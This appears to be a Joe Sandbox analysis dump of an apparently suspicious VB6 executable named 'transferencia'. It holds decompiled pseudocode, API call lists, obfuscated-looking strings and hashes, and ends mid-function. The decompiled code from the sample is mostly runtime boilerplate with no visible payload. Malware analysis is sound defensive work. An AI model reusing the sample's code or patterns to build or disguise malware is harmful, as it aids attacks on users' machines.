0x004100b0
0x004100b0
0x004100b0
0x00410093
0x00410093
0x00410095
0x0041009a
0x0041009d
0x004100a3
0x004100a8
0x004100a8
0x004100ba
0x004100c0
0x004100c0
0x004100c0
0x004100ca
0x004100cd
0x004100d6
0x004100d7
0x004100e1
0x004100e2
0x004100e3
0x004100e4
0x004100e5
0x004100e7
0x004100ea
0x004100f2
0x004100f7
0x004100fa
0x004100fa
0x004100ff
0x00410101
0x00410102
0x00410103
0x00410106
0x00410108
0x00410109
0x0041010a
0x0041010d
0x0041010f
0x00410110
0x00410111
0x0041011a
0x0041011b
0x0041011c
0x0041011f
0x00410124
0x00410129
0x0041012f
0x00410131
0x00410132
0x00410134
0x00410134
0x00410139
0x0041013e
0x00410143
0x00410145
0x0041014e
0x00410150
0x00410157
0x00410164
0x0041016c
0x0041016d
0x00410175
0x00410175
0x00410181
0x0041019e
0x00410183
0x00410183
0x00410188
0x0041018d
0x00410192
0x00410192
0x004101c2
0x004101c6
0x004101cb
0x004101ce
0x004101d5
0x004101df
0x004101e9
0x004101ea
0x004101eb
0x004101ec
0x004101fa
0x00410200
0x00410202
0x00410209
0x00410228
0x00410228
0x00410228
0x0041020b
0x0041020b
0x00410210
0x00410215
0x00410218
0x0041021b
0x00410220
0x00410220
0x00410232
0x00410237
0x0041023e
0x0041023f
0x00410264
0x0041026c
0x0041026f
0x00410272
0x00410273
0x00410275
0x0041027a

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040FF5A
__vbaAryConstruct2.MSVBVM60(?,0040D444,00000005,?,?,?,?,00401236), ref: 0040FF89
#683.MSVBVM60(?,?,?,?,?,?,0040D444,00000005,?,?,?,?,00401236), ref: 0040FFC1
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0040D444,00000005,?,?,?,?,00401236), ref: 0040FFC6
__vbaNew2.MSVBVM60(0040D364,00412358,?,?,?,?,?,?,0040D444,00000005,?,?,?,?,00401236), ref: 0040FFED
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D354,0000001C), ref: 0041003A
__vbaChkstk.MSVBVM60(?), ref: 00410069
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D3E0,00000054), ref: 004100A3
__vbaChkstk.MSVBVM60(00000000,?,0040D3E0,00000054), ref: 004100D7
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 004100EA
__vbaFreeObj.MSVBVM60(?,00000000), ref: 004100F2
__vbaFreeVar.MSVBVM60(?,00000000), ref: 004100FA
#672.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040D444,00000005), ref: 0041011F
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040D444,00000005), ref: 00410124
__vbaEnd.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040D444,00000005), ref: 00410134
__vbaStrComp.MSVBVM60(00000000,0040D400,0040D3F4,?,?,?,?,?,?,?,?,?), ref: 00410145
__vbaVarDup.MSVBVM60(00000000,0040D400,0040D3F4), ref: 00410164
#529.MSVBVM60(?,00000000,0040D400,0040D3F4), ref: 0041016D
__vbaFreeVar.MSVBVM60(?,00000000,0040D400,0040D3F4), ref: 00410175
__vbaNew2.MSVBVM60(0040D778,00412010,00000000,0040D400,0040D3F4,?,?,?,?,?,?,?,?,?), ref: 0041018D
__vbaObjSet.MSVBVM60(?,00000000), ref: 004101C6
__vbaChkstk.MSVBVM60(?,00000000), ref: 004101DF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D430,000001EC), ref: 0041021B
__vbaFreeObj.MSVBVM60(00000000,?,0040D430,000001EC), ref: 00410232
__vbaFreeObj.MSVBVM60(0041027B), ref: 00410264
__vbaAryDestruct.MSVBVM60(00000000,?,0041027B), ref: 00410275

Strings

WARNISS, xrefs: 00410150
FRIGATOON, xrefs: 004101ED
X#A, xrefs: 00410008

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: __vba$Free$Chkstk$CheckHresult$New2$#529#672#683CompConstruct2DestructLate
String ID: FRIGATOON$WARNISS$X#A
API String ID: 539021178-297006117
Opcode ID: 2a7252662d4e2f6780f22ebca0b06993ee8912a1a2d3d80dd19ea1d3ea00c2e8
Instruction ID: 7ba4d208445b3a78341917025afd3f7b05917a22d12f3305e3d3bc3efd425a06
Opcode Fuzzy Hash: 2a7252662d4e2f6780f22ebca0b06993ee8912a1a2d3d80dd19ea1d3ea00c2e8
Instruction Fuzzy Hash: 81912870910618EFDB14EFA1C849BDDBBB5BF08304F10446AF944BB2A1CBB95985CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6B1, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 157
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040F6B1(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				char* _t85;
				signed int _t88;
				char* _t92;
				signed int _t95;
				signed int _t101;
				signed int _t106;
				short _t107;
				void* _t123;
				void* _t125;
				intOrPtr _t126;

				_t126 = _t125 - 0xc;
				 *[fs:0x0] = _t126;
				L00401230();
				_v16 = _t126;
				_v12 = 0x401160;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401236, _t123);
				L004013C2();
				if( *0x412010 != 0) {
					_v68 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v68 = 0x412010;
				}
				_t85 =  &_v36;
				L004013A4();
				_v44 = _t85;
				_t88 =  *((intOrPtr*)( *_v44 + 0x180))(_v44, _t85,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x334))( *_v68));
				asm("fclex");
				_v48 = _t88;
				if(_v48 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x40d324);
					_push(_v44);
					_push(_v48);
					L004013CE();
					_v72 = _t88;
				}
				L00401380();
				if( *0x412010 != 0) {
					_v76 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v76 = 0x412010;
				}
				_t92 =  &_v36;
				L004013A4();
				_v44 = _t92;
				_t95 =  *((intOrPtr*)( *_v44 + 0x1dc))(_v44, _t92,  *((intOrPtr*)( *((intOrPtr*)( *_v76)) + 0x2fc))( *_v76));
				asm("fclex");
				_v48 = _t95;
				if(_v48 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x1dc);
					_push(0x40d334);
					_push(_v44);
					_push(_v48);
					L004013CE();
					_v80 = _t95;
				}
				L00401380();
				if( *0x412358 != 0) {
					_v84 = 0x412358;
				} else {
					_push(0x412358);
					_push(0x40d364);
					L0040139E();
					_v84 = 0x412358;
				}
				_t47 =  &_v84; // 0x412358
				_v44 =  *((intOrPtr*)( *_t47));
				_t101 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v36);
				asm("fclex");
				_v48 = _t101;
				if(_v48 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40d354);
					_push(_v44);
					_push(_v48);
					L004013CE();
					_v88 = _t101;
				}
				_v52 = _v36;
				_t106 =  *((intOrPtr*)( *_v52 + 0x70))(_v52,  &_v40);
				asm("fclex");
				_v56 = _t106;
				if(_v56 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40d374);
					_push(_v52);
					_push(_v56);
					L004013CE();
					_v92 = _t106;
				}
				_t107 = _v40;
				_v28 = _t107;
				L00401380();
				_push(0x40f8d3);
				L004013BC();
				return _t107;
			}

0x0040f6b4
0x0040f6c3
0x0040f6cd
0x0040f6d5
0x0040f6d8
0x0040f6df
0x0040f6ee
0x0040f6f7
0x0040f703
0x0040f71d
0x0040f705
0x0040f705
0x0040f70a
0x0040f70f
0x0040f714
0x0040f714
0x0040f738
0x0040f73c
0x0040f741
0x0040f74c
0x0040f752
0x0040f754
0x0040f75b
0x0040f777
0x0040f75d
0x0040f75d
0x0040f762
0x0040f767
0x0040f76a
0x0040f76d
0x0040f772
0x0040f772
0x0040f77e
0x0040f78a
0x0040f7a4
0x0040f78c
0x0040f78c
0x0040f791
0x0040f796
0x0040f79b
0x0040f79b
0x0040f7bf
0x0040f7c3
0x0040f7c8
0x0040f7d3
0x0040f7d9
0x0040f7db
0x0040f7e2
0x0040f7fe
0x0040f7e4
0x0040f7e4
0x0040f7e9
0x0040f7ee
0x0040f7f1
0x0040f7f4
0x0040f7f9
0x0040f7f9
0x0040f805
0x0040f811
0x0040f82b
0x0040f813
0x0040f813
0x0040f818
0x0040f81d
0x0040f822
0x0040f822
0x0040f832
0x0040f837
0x0040f846
0x0040f849
0x0040f84b
0x0040f852
0x0040f86b
0x0040f854
0x0040f854
0x0040f856
0x0040f85b
0x0040f85e
0x0040f861
0x0040f866
0x0040f866
0x0040f872
0x0040f881
0x0040f884
0x0040f886
0x0040f88d
0x0040f8a6
0x0040f88f
0x0040f88f
0x0040f891
0x0040f896
0x0040f899
0x0040f89c
0x0040f8a1
0x0040f8a1
0x0040f8aa
0x0040f8ae
0x0040f8b5
0x0040f8ba
0x0040f8cd
0x0040f8d2

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040F6CD
__vbaStrCopy.MSVBVM60(?,?,?,?,00401236), ref: 0040F6F7
__vbaNew2.MSVBVM60(0040D778,00412010,?,?,?,?,00401236), ref: 0040F70F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F73C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D324,00000180), ref: 0040F76D
__vbaFreeObj.MSVBVM60 ref: 0040F77E
__vbaNew2.MSVBVM60(0040D778,00412010), ref: 0040F796
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F7C3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D334,000001DC), ref: 0040F7F4
__vbaFreeObj.MSVBVM60 ref: 0040F805
__vbaNew2.MSVBVM60(0040D364,00412358), ref: 0040F81D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D354,00000014), ref: 0040F861
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D374,00000070), ref: 0040F89C
__vbaFreeObj.MSVBVM60 ref: 0040F8B5
__vbaFreeStr.MSVBVM60(0040F8D3), ref: 0040F8CD

Strings

X#A, xrefs: 0040F832

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: __vba$CheckFreeHresult$New2$ChkstkCopy
String ID: X#A
API String ID: 3249766424-580690045
Opcode ID: bb74ee427d0f1ccd49628859b938f0fce415446082daa4acd912198457944317
Instruction ID: 42e0fa8a06c94d0bbab13e753c0548f7909054ed5bf98cfb7438ec6994045cb7
Opcode Fuzzy Hash: bb74ee427d0f1ccd49628859b938f0fce415446082daa4acd912198457944317
Instruction Fuzzy Hash: 7061C375E00208EFDB10EFA5C945BDDBBB5BF08304F14443AE501B76A0C7785859DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8F2, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040F8F2(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				char* _t56;
				signed int _t60;
				char* _t64;
				signed int _t70;
				intOrPtr _t79;
				intOrPtr* _t93;

				_push(0x401236);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t93;
				_push(0x50);
				L00401230();
				_v12 = _t93;
				_v8 = 0x401178;
				if( *0x412010 != 0) {
					_v88 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v88 = 0x412010;
				}
				_t56 =  &_v24;
				L004013A4();
				_v76 = _t56;
				_v32 = 0x80020004;
				_v40 = 0xa;
				L00401230();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t60 =  *((intOrPtr*)( *_v76 + 0x1ec))(_v76, L"Xeroprinting7", 0x10, _t56,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x360))( *_v88));
				asm("fclex");
				_v80 = _t60;
				if(_v80 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x40d3a4);
					_push(_v76);
					_push(_v80);
					L004013CE();
					_v92 = _t60;
				}
				L00401380();
				if( *0x412010 != 0) {
					_v96 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v96 = 0x412010;
				}
				_t79 =  *((intOrPtr*)( *_v96));
				_t64 =  &_v24;
				L004013A4();
				_v76 = _t64;
				_v64 = 0x80020004;
				_v72 = 0xa;
				_v48 = 0x80020004;
				_v56 = 0xa;
				_v32 = 0x80020004;
				_v40 = 0xa;
				L00401230();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401230();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401230();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t93 =  *0x401170;
				_t70 =  *((intOrPtr*)( *_v76 + 0x130))(_v76, _t79, 0x10, 0x10, 0x10, _t64,  *((intOrPtr*)(_t79 + 0x340))( *_v96));
				asm("fclex");
				_v80 = _t70;
				if(_v80 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x40d2b4);
					_push(_v76);
					_push(_v80);
					L004013CE();
					_v100 = _t70;
				}
				L00401380();
				asm("wait");
				_push(0x40faca);
				return _t70;
			}

0x0040f8f7
0x0040f902
0x0040f903
0x0040f90a
0x0040f90d
0x0040f915
0x0040f918
0x0040f926
0x0040f940
0x0040f928
0x0040f928
0x0040f92d
0x0040f932
0x0040f937
0x0040f937
0x0040f95b
0x0040f95f
0x0040f964
0x0040f967
0x0040f96e
0x0040f978
0x0040f982
0x0040f983
0x0040f984
0x0040f985
0x0040f993
0x0040f999
0x0040f99b
0x0040f9a2
0x0040f9be
0x0040f9a4
0x0040f9a4
0x0040f9a9
0x0040f9ae
0x0040f9b1
0x0040f9b4
0x0040f9b9
0x0040f9b9
0x0040f9c5
0x0040f9d1
0x0040f9eb
0x0040f9d3
0x0040f9d3
0x0040f9d8
0x0040f9dd
0x0040f9e2
0x0040f9e2
0x0040f9fc
0x0040fa06
0x0040fa0a
0x0040fa0f
0x0040fa12
0x0040fa19
0x0040fa20
0x0040fa27
0x0040fa2e
0x0040fa35
0x0040fa3f
0x0040fa49
0x0040fa4a
0x0040fa4b
0x0040fa4c
0x0040fa50
0x0040fa5a
0x0040fa5b
0x0040fa5c
0x0040fa5d
0x0040fa61
0x0040fa6b
0x0040fa6c
0x0040fa6d
0x0040fa6e
0x0040fa76
0x0040fa81
0x0040fa87
0x0040fa89
0x0040fa90
0x0040faac
0x0040fa92
0x0040fa92
0x0040fa97
0x0040fa9c
0x0040fa9f
0x0040faa2
0x0040faa7
0x0040faa7
0x0040fab3
0x0040fab8
0x0040fab9
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040F90D
__vbaNew2.MSVBVM60(0040D778,00412010,?,?,?,?,00401236), ref: 0040F932
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F95F
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040F978
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D3A4,000001EC), ref: 0040F9B4
__vbaFreeObj.MSVBVM60 ref: 0040F9C5
__vbaNew2.MSVBVM60(0040D778,00412010), ref: 0040F9DD
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FA0A
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040FA3F
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040FA50
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040FA61
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D2B4,00000130,?,?,00000000), ref: 0040FAA2
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 0040FAB3

Strings

Xeroprinting7, xrefs: 0040F986

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2
String ID: Xeroprinting7
API String ID: 3189907775-3265036206
Opcode ID: 82b6ad223f976c2451f3b5c69daa73ebd9078ea47130ab348affec0f389fc283
Instruction ID: 9532e47ae61f74ff8f92ffb5ac081d7467f5c85ca8e55fdb93ef00926a8bdfe4
Opcode Fuzzy Hash: 82b6ad223f976c2451f3b5c69daa73ebd9078ea47130ab348affec0f389fc283
Instruction Fuzzy Hash: 98512970E10208AFDB10DF91C945BDEBBB5AF09304F20443AF901BB2A1C7B95949CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040FDF1, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040FDF1(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v68;
				signed int _v72;
				char* _t39;
				signed int _t43;
				void* _t56;
				void* _t58;
				intOrPtr _t59;
				signed int _t61;

				_t59 = _t58 - 0xc;
				 *[fs:0x0] = _t59;
				L00401230();
				_v16 = _t59;
				_v12 = 0x4011b0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401236, _t56);
				L004013C2();
				if( *0x412010 != 0) {
					_v68 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v68 = 0x412010;
				}
				_t39 =  &_v32;
				L004013A4();
				_v52 = _t39;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L00401230();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t43 =  *((intOrPtr*)( *_v52 + 0x1b0))(_v52, 0x10, _t39,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x320))( *_v68));
				asm("fclex");
				_v56 = _t43;
				_t61 = _v56;
				if(_t61 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x1b0);
					_push(0x40d314);
					_push(_v52);
					_push(_v56);
					L004013CE();
					_v72 = _t43;
				}
				L00401380();
				asm("fldz");
				L004012B4();
				L0040134A();
				asm("fcomp qword [0x4011a8]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t61 != 0) {
					_push(L"Blane4");
					L00401344();
				}
				asm("wait");
				_push(0x40ff1d);
				L004013BC();
				return _t43;
			}

0x0040fdf4
0x0040fe03
0x0040fe0d
0x0040fe15
0x0040fe18
0x0040fe1f
0x0040fe2e
0x0040fe37
0x0040fe43
0x0040fe5d
0x0040fe45
0x0040fe45
0x0040fe4a
0x0040fe4f
0x0040fe54
0x0040fe54
0x0040fe78
0x0040fe7c
0x0040fe81
0x0040fe84
0x0040fe8b
0x0040fe95
0x0040fe9f
0x0040fea0
0x0040fea1
0x0040fea2
0x0040feab
0x0040feb1
0x0040feb3
0x0040feb6
0x0040feba
0x0040fed6
0x0040febc
0x0040febc
0x0040fec1
0x0040fec6
0x0040fec9
0x0040fecc
0x0040fed1
0x0040fed1
0x0040fedd
0x0040fee2
0x0040fee4
0x0040fee9
0x0040feee
0x0040fef4
0x0040fef6
0x0040fef7
0x0040fef9
0x0040fefe
0x0040fefe
0x0040ff03
0x0040ff04
0x0040ff17
0x0040ff1c

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040FE0D
__vbaStrCopy.MSVBVM60(?,?,?,?,00401236), ref: 0040FE37
__vbaNew2.MSVBVM60(0040D778,00412010,?,?,?,?,00401236), ref: 0040FE4F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FE7C
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040FE95
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D314,000001B0), ref: 0040FECC
__vbaFreeObj.MSVBVM60(00000000,?,0040D314,000001B0), ref: 0040FEDD
_CItan.MSVBVM60(00000000,?,0040D314,000001B0), ref: 0040FEE4
__vbaFpR8.MSVBVM60(00000000,?,0040D314,000001B0), ref: 0040FEE9
#531.MSVBVM60(Blane4), ref: 0040FEFE
__vbaFreeStr.MSVBVM60(0040FF1D), ref: 0040FF17

Strings

Blane4, xrefs: 0040FEF9

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: __vba$ChkstkFree$#531CheckCopyHresultItanNew2
String ID: Blane4
API String ID: 2748546832-1467846035
Opcode ID: ba8aad2ed33d7fe1527016cca117cc1279d225880d5c4312bae289918eb1a28a
Instruction ID: 88de0529fd405d6da4bf0f73ae4a5797c633df35f7e97a0cdf37507e0f61f43b
Opcode Fuzzy Hash: ba8aad2ed33d7fe1527016cca117cc1279d225880d5c4312bae289918eb1a28a
Instruction Fuzzy Hash: 43313870900208EFDB20EF91D945B9EBBB5BF09704F10457AF901BB6E1C7B86909CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC27, Relevance: 18.1, APIs: 12, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040FC27(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr* _v72;
				signed int _v76;
				intOrPtr* _v80;
				signed int _v84;
				char* _t57;
				signed int _t60;
				char* _t64;
				signed int _t68;
				char* _t69;
				char* _t71;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t86 = _t85 - 0xc;
				 *[fs:0x0] = _t86;
				L00401230();
				_v16 = _t86;
				_v12 = 0x401198;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401236, _t83);
				if( *0x412010 != 0) {
					_v72 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v72 = 0x412010;
				}
				_t57 =  &_v32;
				L004013A4();
				_v56 = _t57;
				_t60 =  *((intOrPtr*)( *_v56 + 0x1a8))(_v56, _t57,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x354))( *_v72));
				asm("fclex");
				_v60 = _t60;
				if(_v60 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x1a8);
					_push(0x40d2ec);
					_push(_v56);
					_push(_v60);
					L004013CE();
					_v76 = _t60;
				}
				L00401380();
				if( *0x412010 != 0) {
					_v80 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v80 = 0x412010;
				}
				_t64 =  &_v32;
				L004013A4();
				_v56 = _t64;
				_t68 =  *((intOrPtr*)( *_v56 + 0x158))(_v56,  &_v36, _t64,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x36c))( *_v80));
				asm("fclex");
				_v60 = _t68;
				if(_v60 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x40d314);
					_push(_v56);
					_push(_v60);
					L004013CE();
					_v84 = _t68;
				}
				_push(0);
				_push(0);
				_push(_v36);
				_t69 =  &_v52;
				_push(_t69);
				L00401350();
				_push(_t69);
				L00401356();
				_v28 = _t69;
				_push( &_v36);
				_t71 =  &_v32;
				_push(_t71);
				_push(2);
				L00401398();
				L004013AA();
				_push(0x40fdca);
				return _t71;
			}

0x0040fc2a
0x0040fc39
0x0040fc43
0x0040fc4b
0x0040fc4e
0x0040fc55
0x0040fc64
0x0040fc6e
0x0040fc88
0x0040fc70
0x0040fc70
0x0040fc75
0x0040fc7a
0x0040fc7f
0x0040fc7f
0x0040fca3
0x0040fca7
0x0040fcac
0x0040fcb7
0x0040fcbd
0x0040fcbf
0x0040fcc6
0x0040fce2
0x0040fcc8
0x0040fcc8
0x0040fccd
0x0040fcd2
0x0040fcd5
0x0040fcd8
0x0040fcdd
0x0040fcdd
0x0040fce9
0x0040fcf5
0x0040fd0f
0x0040fcf7
0x0040fcf7
0x0040fcfc
0x0040fd01
0x0040fd06
0x0040fd06
0x0040fd2a
0x0040fd2e
0x0040fd33
0x0040fd42
0x0040fd48
0x0040fd4a
0x0040fd51
0x0040fd6d
0x0040fd53
0x0040fd53
0x0040fd58
0x0040fd5d
0x0040fd60
0x0040fd63
0x0040fd68
0x0040fd68
0x0040fd71
0x0040fd73
0x0040fd75
0x0040fd78
0x0040fd7b
0x0040fd7c
0x0040fd84
0x0040fd85
0x0040fd8a
0x0040fd90
0x0040fd91
0x0040fd94
0x0040fd95
0x0040fd97
0x0040fda2
0x0040fda7
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040FC43
__vbaNew2.MSVBVM60(0040D778,00412010,?,?,?,?,00401236), ref: 0040FC7A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FCA7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D2EC,000001A8), ref: 0040FCD8
__vbaFreeObj.MSVBVM60(00000000,?,0040D2EC,000001A8), ref: 0040FCE9
__vbaNew2.MSVBVM60(0040D778,00412010), ref: 0040FD01
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FD2E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D314,00000158), ref: 0040FD63
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040FD7C
__vbaI4Var.MSVBVM60(00000000,?,?,?,00401236), ref: 0040FD85
__vbaFreeObjList.MSVBVM60(00000002,?,00000000,00000000,?,?,?,00401236), ref: 0040FD97
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,00401236), ref: 0040FDA2

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: __vba$Free$CheckHresultNew2$CallChkstkLateList
String ID:
API String ID: 1274998142-0
Opcode ID: 79d34934fd83e8b119650afe3e51fdc77aa63f4c8b95bf1ea4b0b99098894284
Instruction ID: 4ab83dafc8d0cfdf46ce8d0bbda4015dffcf34b5a9a622686aae67568228cdfa
Opcode Fuzzy Hash: 79d34934fd83e8b119650afe3e51fdc77aa63f4c8b95bf1ea4b0b99098894284
Instruction Fuzzy Hash: 01410770E00208AFDB10EFA0D945B9DBBB9BF08704F20443AF901BB6A1D7B95955DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040FADD, Relevance: 18.1, APIs: 12, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040FADD(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				intOrPtr _v28;
				char _v32;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				short _v68;
				signed int _v72;
				intOrPtr* _v80;
				signed int _v84;
				char* _t41;
				signed int _t44;
				char* _t46;
				short _t47;
				intOrPtr _t67;

				_push(0x401236);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t67;
				_push(0x40);
				L00401230();
				_v12 = _t67;
				_v8 = 0x401188;
